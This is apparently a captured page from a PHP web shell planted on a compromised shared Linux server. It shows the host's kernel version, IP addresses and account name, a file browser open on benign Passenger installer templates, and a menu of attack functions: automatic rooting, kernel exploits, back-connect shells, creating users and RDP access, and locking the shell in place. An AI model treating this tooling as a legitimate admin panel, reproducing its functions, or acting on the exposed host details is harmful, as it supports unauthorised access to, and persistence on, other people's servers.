Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
passenger /
templates /
installer_common /
[ HOME SHELL ]
Name
Size
Permission
Action
cannot_access_files_as_root.tx...
728
B
-rw-r--r--
gem_install_permission_problem...
739
B
-rw-r--r--
low_amount_of_memory_warning.t...
1000
B
-rw-r--r--
run_installer_as_root.txt.erb
552
B
-rw-r--r--
world_inaccessible_directories...
663
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run_installer_as_root.txt.erb
<red>Permission problems</red> <% if @desc %> This installer must be able to <%= @access || "write to" %> <%= @desc %>. <% else %> This installer must be able to <%= @access || "write to" %> the following directory: <b><%= @dir %></b> <% end -%> But it can't do that, because you're running the installer as <b><%= `whoami`.strip %></b>. Please give this installer root privileges, by re-running it with <yellow><%= @sudo %></yellow>: <b>export ORIG_PATH="$PATH" <%= @sudo_s_e %> export PATH="$ORIG_PATH" <%= @ruby %> <%= @installer %></b>
Close